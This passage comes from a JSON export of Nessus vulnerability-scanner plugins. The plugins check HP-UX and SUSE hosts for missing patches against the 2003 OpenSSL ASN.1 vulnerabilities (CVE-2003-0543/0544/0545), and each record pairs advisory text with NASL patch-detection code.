value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_xref(name:\"CERT\", value:\"104280\");\n script_xref(name:\"CERT\", value:\"255484\");\n script_xref(name:\"CERT\", value:\"686224\");\n script_xref(name:\"CERT\", value:\"732952\");\n script_xref(name:\"CERT\", value:\"935264\");\n script_xref(name:\"HP\", value:\"HPSBUX0310\");\n script_xref(name:\"HP\", value:\"SSRT3622\");\n\n script_name(english:\"HP-UX PHSS_29690 : HPSBUX0310-284 SSRT3622 rev.3 HP-UX Apache HTTP Server Denial of Service,unauthorized access\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.5 OWS update : \n\nPotential Apache HTTP server vulnerabilities have been reported:\nCVE-2003-0545 CVE-2003-0543 CVE-2003-0544 CERT VU#935264 CERT\nVU#255484 CERT VU#255484 CERT VU#686224 CERT VU#732952 CERT VU#104280\nhttp://www.openssl.org/news/secadv/20030930.txt.\"\n );\n # http://www.openssl.org/news/secadv/20030930.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20030930.txt\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_29690 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/12/01\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2004/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_29690 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_29690\", \"PHSS_30160\", \"PHSS_30648\", \"PHSS_31828\", \"PHSS_32184\", \"PHSS_33396\", \"PHSS_34119\", \"PHSS_35107\", \"PHSS_35461\", \"PHSS_35556\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTS.VV-CORE-CMN\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-GUI\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-JAVA\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-JK\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultWS.WS-CORE\", version:\"A.04.50\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:32:06", "description": "s700_800 11.23 Bind 9.2.0 components : \n\n1. Certain ASN.1 encodings that are rejected as invalid by the parser\ncan trigger a bug in the deallocation of the corresponding data\nstructure, corrupting the stack. This can be used as a denial of\nservice attack. It is currently unknown whether this can be exploited\nto run malicious code. This issue does not affect OpenSSL 0.9.6. More\ndetails are available at: CVE-2003-0545 2. Unusual ASN.1 tag values\ncan cause an out of bounds read under certain circumstances, resulting\nin a denial of service vulnerability. More details are available at:\nCVE-2003-0543 CVE-2003-0544 3. A malformed public key in a certificate\nwill crash the verify code if it is set to ignore public key decoding\nerrors. Exploitation of an affected application would result in a\ndenial of service vulnerability. 4. Due to an error in the SSL/TLS\nprotocol handling, a server will parse a client certificate when one\nis not specifically requested.", "edition": 23, "published": "2005-02-16T00:00:00", "title": "HP-UX PHNE_31726 : HP-UX Running BIND v920, Remote Denial of Service (DoS) (HPSBUX00290 SSRT3622 rev.5)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "modified": "2005-02-16T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_31726.NASL", "href": "https://www.tenable.com/plugins/nessus/16912", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_31726. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(16912);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_xref(name:\"HP\", value:\"emr_na-c00901847\");\n script_xref(name:\"HP\", value:\"HPSBUX00290\");\n script_xref(name:\"HP\", value:\"SSRT3622\");\n\n script_name(english:\"HP-UX PHNE_31726 : HP-UX Running BIND v920, Remote Denial of Service (DoS) (HPSBUX00290 SSRT3622 rev.5)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.23 Bind 9.2.0 components : \n\n1. Certain ASN.1 encodings that are rejected as invalid by the parser\ncan trigger a bug in the deallocation of the corresponding data\nstructure, corrupting the stack. This can be used as a denial of\nservice attack. It is currently unknown whether this can be exploited\nto run malicious code. This issue does not affect OpenSSL 0.9.6. More\ndetails are available at: CVE-2003-0545 2. Unusual ASN.1 tag values\ncan cause an out of bounds read under certain circumstances, resulting\nin a denial of service vulnerability. More details are available at:\nCVE-2003-0543 CVE-2003-0544 3. A malformed public key in a certificate\nwill crash the verify code if it is set to ignore public key decoding\nerrors. Exploitation of an affected application would result in a\ndenial of service vulnerability. 4. Due to an error in the SSL/TLS\nprotocol handling, a server will parse a client certificate when one\nis not specifically requested.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00901847\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e1604c4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_31726 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/09/22\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23\"))\n{\n exit(0, \"The host is not affected since PHNE_31726 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_31726\", \"PHNE_32443\", \"PHNE_34226\", \"PHNE_35920\", \"PHNE_36219\", \"PHNE_36973\", \"PHNE_37548\", \"PHNE_37865\", \"PHNE_40089\", \"PHNE_40339\", \"PHNE_41721\", \"PHNE_42727\", \"PHNE_43096\", \"PHNE_43278\", \"PHNE_43369\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"InternetSrvcs.INET-ENG-A-MAN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INETSVCS-INETD\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INETSVCS-RUN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INETSVCS2-RUN\", version:\"B.11.23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:14:43", "description": "The remote host is missing the patch for the advisory SUSE-SA:2003:043 (openssl).\n\n\nOpenSSL is an implementation of the Secure Socket Layer (SSL v2/3)\nand Transport Layer Security (TLS v1) protocol.\nWhile checking the openssl implementation with a tool-kit from NISCC\nseveral errors were revealed most are ASN.1 encoding issues that\ncauses a remote denial-of-service attack on the server side and\npossibly lead to remote command execution.\n\nThere are two problems with ASN.1 encoding that can be triggered either\nby special ASN.1 encodings or by special ASN.1 tags.\n\nIn debugging mode public key decoding errors can be ignored but\nalso lead to a crash of the verify code if an invalid public key\nwas received from the client.\n\nA mistake in the SSL/TLS protocol handling will make the server accept\nclient certificates even if they are not requested. This bug makes\nit possible to exploit the bugs mentioned above even if client\nauthentication is disabled.\n\nThere is not other solution known to this problem then updating to the\ncurrent version from our FTP servers.\n\nTo make this update effective, restart all servers using openssl please.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.", "edition": 23, "published": "2004-07-25T00:00:00", "title": "SUSE-SA:2003:043: openssl", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "modified": "2004-07-25T00:00:00", "cpe": [], "id": "SUSE_SA_2003_043.NASL", "href": "https://www.tenable.com/plugins/nessus/13811", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2003:043\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(13811);\n script_version(\"1.16\");\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n \n name[\"english\"] = \"SUSE-SA:2003:043: openssl\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2003:043 (openssl).\n\n\nOpenSSL is an implementation of the Secure Socket Layer (SSL v2/3)\nand Transport Layer Security (TLS v1) protocol.\nWhile checking the openssl implementation with a tool-kit from NISCC\nseveral errors were revealed most are ASN.1 encoding issues that\ncauses a remote denial-of-service attack on the server side and\npossibly lead to remote command execution.\n\nThere are two problems with ASN.1 encoding that can be triggered either\nby special ASN.1 encodings or by special ASN.1 tags.\n\nIn debugging mode public key decoding errors can be ignored but\nalso lead to a crash of the verify code if an invalid public key\nwas received from the client.\n\nA mistake in the SSL/TLS protocol handling will make the server accept\nclient certificates even if they are not requested. This bug makes\nit possible to exploit the bugs mentioned above even if client\nauthentication is disabled.\n\nThere is not other solution known to this problem then updating to the\ncurrent version from our FTP servers.\n\nTo make this update effective, restart all servers using openssl please.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2003_043_openssl.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the openssl package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"openssl-0.9.6a-83\", release:\"SUSE7.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-doc-0.9.6a-83\", release:\"SUSE7.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-devel-0.9.6a-83\", release:\"SUSE7.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-0.9.6b-158\", release:\"SUSE7.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-doc-0.9.6b-158\", release:\"SUSE7.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-devel-0.9.6b-158\", release:\"SUSE7.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-0.9.6c-86\", release:\"SUSE8.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-doc-0.9.6c-86\", release:\"SUSE8.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-devel-0.9.6c-86\", release:\"SUSE8.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-0.9.6g-99\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-doc-0.9.6g-99\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-devel-0.9.6g-99\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-0.9.6i-19\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-doc-0.9.6i-19\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-devel-0.9.6i-19\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-0.9.7b-71\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-doc-0.9.7b-71\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-devel-0.9.7b-71\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"openssl-\", release:\"SUSE7.2\")\n || rpm_exists(rpm:\"openssl-\", release:\"SUSE7.3\")\n || rpm_exists(rpm:\"openssl-\", release:\"SUSE8.0\")\n || rpm_exists(rpm:\"openssl-\", release:\"SUSE8.1\")\n || rpm_exists(rpm:\"openssl-\", release:\"SUSE8.2\")\n || rpm_exists(rpm:\"openssl-\", release:\"SUSE9.0\") )\n{\n set_kb_item(name:\"CVE-2003-0543\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0544\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0545\", value:TRUE);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:32:10", "description": "s700_800 11.04 Virtualvault 4.6 IWS update : \n\nPotential Apache HTTP server vulnerabilities have been reported:\nCVE-2003-0545 CVE-2003-0543 CVE-2003-0544 CERT VU#935264 CERT\nVU#255484 CERT VU#255484 CERT VU#686224 CERT VU#732952 CERT VU#104280\nhttp://www.openssl.org/news/secadv/20030930.txt.", "edition": 24, "published": "2005-03-18T00:00:00", "title": "HP-UX PHSS_29893 : HPSBUX0310-284 SSRT3622 rev.3 HP-UX Apache HTTP Server Denial of Service,unauthorized access", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "modified": "2005-03-18T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_29893.NASL", "href": "https://www.tenable.com/plugins/nessus/17510", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_29893. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17510);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_xref(name:\"CERT\", value:\"104280\");\n script_xref(name:\"CERT\", value:\"255484\");\n script_xref(name:\"CERT\", value:\"686224\");\n script_xref(name:\"CERT\", value:\"732952\");\n script_xref(name:\"CERT\", value:\"935264\");\n script_xref(name:\"HP\", value:\"HPSBUX0310\");\n script_xref(name:\"HP\", value:\"SSRT3622\");\n\n script_name(english:\"HP-UX PHSS_29893 : HPSBUX0310-284 SSRT3622 rev.3 HP-UX Apache HTTP Server Denial of Service,unauthorized access\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.6 IWS update : \n\nPotential Apache HTTP server vulnerabilities have been reported:\nCVE-2003-0545 CVE-2003-0543 CVE-2003-0544 CERT VU#935264 CERT\nVU#255484 CERT VU#255484 CERT VU#686224 CERT VU#732952 CERT VU#104280\nhttp://www.openssl.org/news/secadv/20030930.txt.\"\n );\n # http://www.openssl.org/news/secadv/20030930.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20030930.txt\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_29893 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/10/17\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2004/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_29893 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_29893\", \"PHSS_30153\", \"PHSS_30643\", \"PHSS_30946\", \"PHSS_31825\", \"PHSS_32139\", \"PHSS_32206\", \"PHSS_34170\", \"PHSS_35105\", \"PHSS_35307\", \"PHSS_35459\", \"PHSS_35554\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS\", version:\"A.04.60\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:32:10", "description": "s700_800 11.04 Webproxy server 2.1 update : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential Apache HTTP server vulnerabilities have been\n reported: CVE-2003-0545 CVE-2003-0543 CVE-2003-0544 CERT\n VU#935264 CERT VU#255484 CERT VU#255484 CERT VU#686224\n CERT VU#732952 CERT VU#104280\n http://www.openssl.org/news/secadv/20030930.txt.\n\n - Multiple stack-based buffer overflows in mod_alias and\n mod_rewrite modules for Apache versions prior to 1.3.29.", "edition": 24, "published": "2005-03-18T00:00:00", "title": "HP-UX PHSS_30058 : s700_800 11.04 Webproxy server 2.1 update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "modified": "2005-03-18T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_30058.NASL", "href": "https://www.tenable.com/plugins/nessus/17514", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_30058. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17514);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_bugtraq_id(8911);\n script_xref(name:\"CERT\", value:\"104280\");\n script_xref(name:\"CERT\", value:\"255484\");\n script_xref(name:\"CERT\", value:\"686224\");\n script_xref(name:\"CERT\", value:\"732952\");\n script_xref(name:\"CERT\", value:\"935264\");\n script_xref(name:\"HP\", value:\"HPSBUX0310\");\n script_xref(name:\"HP\", value:\"HPSBUX0401\");\n script_xref(name:\"HP\", value:\"SSRT3622\");\n script_xref(name:\"HP\", value:\"SSRT4681\");\n\n script_name(english:\"HP-UX PHSS_30058 : s700_800 11.04 Webproxy server 2.1 update\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Webproxy server 2.1 update : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential Apache HTTP server vulnerabilities have been\n reported: CVE-2003-0545 CVE-2003-0543 CVE-2003-0544 CERT\n VU#935264 CERT VU#255484 CERT VU#255484 CERT VU#686224\n CERT VU#732952 CERT VU#104280\n http://www.openssl.org/news/secadv/20030930.txt.\n\n - Multiple stack-based buffer overflows in mod_alias and\n mod_rewrite modules for Apache versions prior to 1.3.29.\"\n );\n # http://www.openssl.org/news/secadv/20030930.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20030930.txt\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_30058 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/12/05\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2004/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_30058 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_30058\", \"PHSS_30649\", \"PHSS_30950\", \"PHSS_31830\", \"PHSS_32362\", \"PHSS_33074\", \"PHSS_33666\", \"PHSS_34203\", \"PHSS_35111\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"HP_Webproxy.HPWEB-PX-CORE\", version:\"A.02.10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:32:10", "description": "s700_800 11.04 Virtualvault 4.6 TGP update : \n\nPotential Apache HTTP server vulnerabilities have been reported:\nCVE-2003-0545 CVE-2003-0543 CVE-2003-0544 CERT VU#935264 CERT\nVU#255484 CERT VU#255484 CERT VU#686224 CERT VU#732952 CERT VU#104280\nhttp://www.openssl.org/news/secadv/20030930.txt.", "edition": 24, "published": "2005-03-18T00:00:00", "title": "HP-UX PHSS_29891 : HPSBUX0310-284 SSRT3622 rev.3 HP-UX Apache HTTP Server Denial of Service,unauthorized access", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "modified": "2005-03-18T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_29891.NASL", "href": "https://www.tenable.com/plugins/nessus/17508", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_29891. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17508);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_xref(name:\"CERT\", value:\"104280\");\n script_xref(name:\"CERT\", value:\"255484\");\n script_xref(name:\"CERT\", value:\"686224\");\n script_xref(name:\"CERT\", value:\"732952\");\n script_xref(name:\"CERT\", value:\"935264\");\n 